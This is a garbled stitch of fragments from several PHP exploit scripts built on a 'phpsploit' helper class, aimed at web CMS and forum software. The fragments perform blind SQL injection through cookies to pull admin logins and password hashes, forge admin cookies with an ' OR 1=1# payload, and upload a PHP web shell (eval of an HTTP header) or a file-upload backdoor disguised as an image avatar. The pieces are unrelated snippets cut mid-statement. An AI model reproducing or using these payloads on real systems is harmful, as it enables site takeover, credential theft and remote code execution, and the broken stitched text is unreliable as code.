} $url = getparam("url", 1); $login = getparam("login", 1); $pass = getparam("pass", 1); $email = getparam("email", 1); $file = getparam("file", 1); $id = getparam("id"); $source = @file_get_contents($file); if (strlen($source) < 2) { exit("{$file} don't exist.\n"); } $xpl = new phpsploit(); $s = $xpl->post($url . "/index.php?", "sql_pseudo={$login}&sql_pass={$pass}"); //Cookies if (preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i", $s, $phpsessid) && !preg_match("#name=\"sql_pseudo\"#i", $s)) { $xpl->addcookie("PHPSESSID", $phpsessid[1]); $xpl->addcookie("sql_pseudo", $login); $xpl->addcookie("sql_pass", md5($pass)); $xpl->addcookie("auto", "off"); print "[*] PHPSESSID : {$phpsessid['1']}\n"; } else { exit("[*] Can't log in\n"); } //Id if (!isset($id)) { preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . $login . "<\\/a>#i", $s, $id_member); $id = $id_member[1]; } print "[*] Id : {$id}\n"; //Upload $formdata = array(frmdt_url => $url . '/index.php?mod=espace_membre&ac=profil', 'action' => 'modifier', 'ok' => '1', 'id' => $id, 'pseudo' => $login, 'sql_newNom' => $login, 'sql_newMail' => $email, 'MAX_FILE_SIZE' => '2097152', 'valider' => ' Modifier mon profil', 'userfile[]' => array(frmdt_type => 'image/jpeg', frmdt_filename => 'test.jpg', frmdt_content => $source));
$xpl->get($url . str_replace("./", "/", $matches[1])); preg_match_all("#(.*)='(.*)';#", $xpl->getcontent(), $vars); for ($z = 0; $z <= 4; $z++) { print "\nsploit> " . strtolower($vars[1][$z]) . " -> " . $vars[2][$z]; } } } print "\nstatus> Trying to get the administrator login/passwd"; $headers = array("Username", "Password"); $fields = array("login", "passwd"); $value = $length = array(); for ($a = 0; $a < 2; $a++) { print "\nsploit> " . $headers[$a] . " length "; for ($b = 1; $b < 3; $b++) { for ($c = 48; $c <= 57; $c++) { $xpl->addcookie("fid", "-1%20OR%20SUBSTR(LENGTH((SELECT%20" . $fields[$a] . "%20FROM%20atk_users%20WHERE%20(admin)%20LIMIT%201)),{$b},1)=CHAR({$c})"); if (!preg_match("#<TITLE></TITLE>#i", $xpl->getcontent($xpl->get($url . "forum.php")))) { $length[$a] .= chr($c); print chr($c); break; } } } print "\nsploit> " . $headers[$a] . " -> "; for ($d = 1; $d <= $length[$a]; $d++) { for ($e = 0; $e <= 128; $e++) { $xpl->addcookie("fid", "-1%20OR%20HEX(SUBSTR((SELECT%20" . $fields[$a] . "%20FROM%20atk_users%20WHERE%20(admin)%20LIMIT%201),{$d},1))=HEX(CHAR({$e}))"); if (!preg_match("#<TITLE></TITLE>#i", $xpl->getcontent($xpl->get($url . "forum.php")))) { $value[$a] .= chr($e); print chr($e); break;
# 71. list($AIpass, $Xsuper_admintest)=mysql_fetch_row($result); # 72. if (md5($AIpass) == $AIpwd and $AIpass != "") { # 73. $admintest = true; # 74. $super_admintest = $Xsuper_admintest; # 75. } else { # 76. Admin_Alert("Password in Cookies not Good #1 : $aid / $AIpwd | "); # 77. } # 78. } # 79. unset ($AIpass); # 80. unset ($AIpwd); # 81. unset ($Xadmin); # 82. unset ($Xsuper_admintest); # 83. } # $c*k = urlencode(base64_encode($aid[1] . ':' . md5($pwd[1]))); $xpl->addcookie('admin', $c*k); print "\nAdmin_cookie: admin={$c*k}\n\$shell> "; # +admin/settings.php (CODE EXECUTION) # | # 758. switch($op) { # 763. case "ConfigSave": # 764. include("admin/settings_save.php"); # 765. ConfigSave($xparse,$xsitename,$xnuke_url,$xsite_logo,$xslogan,$xstartdate,$xadminmail, # $xtop,$xstoryhome,$xoldnum,$xultramode,$xanonpost,$xDefault_Theme,$xbanners,$xmyIP, # $xfoot1,$xfoot2,$xfoot3,$xfoot4,$xbackend_title,$xbackend_language,$xbackend_image, # $xbackend_width,$xbackend_height,$xlanguage,$xlocale,$xperpage,$xpopular,$xnewlinks, # $xtoplinks,$xlinksresults,$xlinks_anonaddlinklock,$xnotify,$xnotify_email,$xnotify_subject, # $xnotify_message,$xnotify_from,$xmoderate,$xcommentlimit,$xanonymous,$xmaxOptions,$xBarScale, # $xsetCookies,$xtipath,$xuserimg,$xadminimg,$xadmingraphic,$xsite_font,$xadmart,$xminpass, # $xhttpref,$xhttprefmax,$xpollcomm,$xlinkmainlogo,$xstart_page,$xsmilies,$xOnCatNewLink, # $xEmailFooter,$xshort_user,$xgzhandler,$xrss_host_verif,$xcache_verif,$xmember_list,
$proxy = getparam('proxy'); $authp = getparam('proxyauth'); $xpl = new phpsploit(); $xpl->agent("Mozilla Firefox"); if ($proxy) { $xpl->proxy($proxy); } if ($authp) { $xpl->proxyauth($authp); } print "\nAdmin id: "; $userid = blind('userID'); print "\nAdmin hash: "; $passwd = strtolower(blind('password')); print "\nLogged in (ws_auth={$userid}%3A{$passwd})"; $xpl->addcookie("ws_auth", $userid . "%3A" . $passwd); # File upload vulnerability # # +files.php # | # 42. $action = $_GET['action']; # 43. if($action=="save") { # 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3")); # 46. $upfile = $_FILES[upfile]; # 69. $filepath = "./downloads/"; # 71. $des_file = $filepath.$upfile[name]; # 72. if(!file_exists($des_file)) { # 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) { # print "\nTrying to upload the malicious file"; $frmdt = array(frmdt_url => $url . 'index.php?site=files&action=save', "fileurl" => 1, "upfile" => array(frmdt_filename => basename($file), frmdt_content => file_get_contents($file)));
# `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."', # '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from', # '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."', # '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')"); # # We insert a row in $prefix."_nsnst_tracked_ips". # print "\nInserting a row in {$prfix}_nsnst_tracked_ips"; $xpl->addheader("Client-IP", "255.255.255.255"); $xpl->get($url . 'index.php'); # Trying to find a valid tid. # Needed for $tum > 0. # print "\nTrying to find a valid tid (max hits={$nbtst})"; $sql = "' OR 1=1#"; $xpl->addcookie("admin", urlencode(base64_encode($sql . ':1:'))); for ($c = $tid; $c <= $nbtst; $c++) { $xpl->get($url . "includes/nsbypass.php?tid={$c}"); if (!preg_match("#phpnuke.org#", $xpl->getheader())) { $tid = $c; print "\nValid tid found: {$tid}\nHash: {$login} -> "; break; } if ($c == $nbtst) { exit("\n#1 Exploit failed"); } } # MD5 hash length [32] # for ($a = 1; $a <= 32; $a++) { # MD5 charset [a-f0-9]
print " by Charles \"real\" F. <charlesfol[at]hotmail.fr>\n\n"; if ($argc < 3) { print "usage: php phptn_exploit.php -url <url> [options]\n\n"; print " Options: -mode 0 -> Remote Upload (default)\n"; print " 1 -> Remote Code Execution\n"; print " -proxy If you want to use a proxy.\n"; exit; } $url = getparam("url", 1); $mode = getparam("mode") ? getparam("mode") : 0; $prx = getparam("proxy"); $xpl = new phpsploit(); if ($prx) { $xpl->proxy($prx); } $xpl->addcookie("grade[a]", "a"); /* Code in the fake avatar */ if ($mode == 0) { $file_upload_code = '<?php if(isset($_POST[\'d\'])) unlink(__FILE__); ?><?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"><input type="submit" name="d" value="x"></center></form><br><form method="get"></form>'; $c0de = '<?php' . "\n" . 'error_reporting(0);' . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include("include/files/accueil.php"); ?>'; } else { $c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'include("include/files/accueil.php"); ?>'; } /* Upload avatar with PHP c0de */ print " * uploading avatar\t"; $avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999); if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) { print "done\n"; } else { die("error\n"); }
print " SID -> {$admin_sid}\n"; print " UID -> {$admin_uid}\n"; finalattack($admin_sid, $admin_uid); } else { exit("[*] Can't log in\n"); } } else { /* User account defined */ if ($acc) { print "[*] Using user account {$acc}\n"; list($login, $passwd) = explode(":", $acc); $xpl->addheader("Referer", $url); $c = $xpl->post($url . "index.php?file=User&nuked_nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok"); if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) { # User Cookies $xpl->addcookie("{$prefix}sess_id", $sid[1]); $xpl->addcookie("{$prefix}user_id", $uid[1]); } else { exit("[*] Can't log in\n"); } } $queries = array(); $queries[] = array(" SID", "SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1"); $queries[] = array(" UID", "SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1"); $queries[] = array(" Login", "SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1"); $queries[] = array("Password", "SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1"); $xpl->agent("Mozilla Firefox"); $xpl->addheader("X-Forwarded-For", "127.0.0.1"); $ctmp = $xpl->get($url . "index.php?file=Stats&page=visits"); if (preg_match('#<a href="javascript:history.back\\(\\)"><b>[^<]+</b>#i', $ctmp)) { exit("[*] You don't have rights to access Stats page.\n");
$xpl->get($url); $xpl->reset('header'); } if (!preg_match_all("#{$config['3']}([0123]{1})(\\S*){$config['3']}([0123]{1})#", $xpl->getcontent(), $matches)) { die("Exploit Failed"); } $what = array("login", "passwd", "user_id", "session"); for ($i = 0; $i < count($what); $i++) { print "\n" . $what[$i] . " -> " . $matches[2][$i]; } if (empty($matches[2][3])) { exit("\nNo session found"); } # Logged in as admin $name = array("admin_session", "user_id", "sess_id"); $xpl->addcookie($config[1] . '_' . $name[0], $matches[2][2]); $xpl->addcookie($config[1] . '_' . $name[1], $matches[2][2]); $xpl->addcookie($config[1] . '_' . $name[2], $matches[2][3]); $phpc = array(frmdt_url => $url . '?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4])); $xpl->addheader('Referer', $url); $xpl->formdata($phpc); $xpl->get($url . '?file=User&op=edit_pref'); if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) { exit("\nNo file found"); } else { print "\n\$shell> "; } $sql = array(); $sql[] = "ALTER TABLE {$config['0']}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;"; /* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/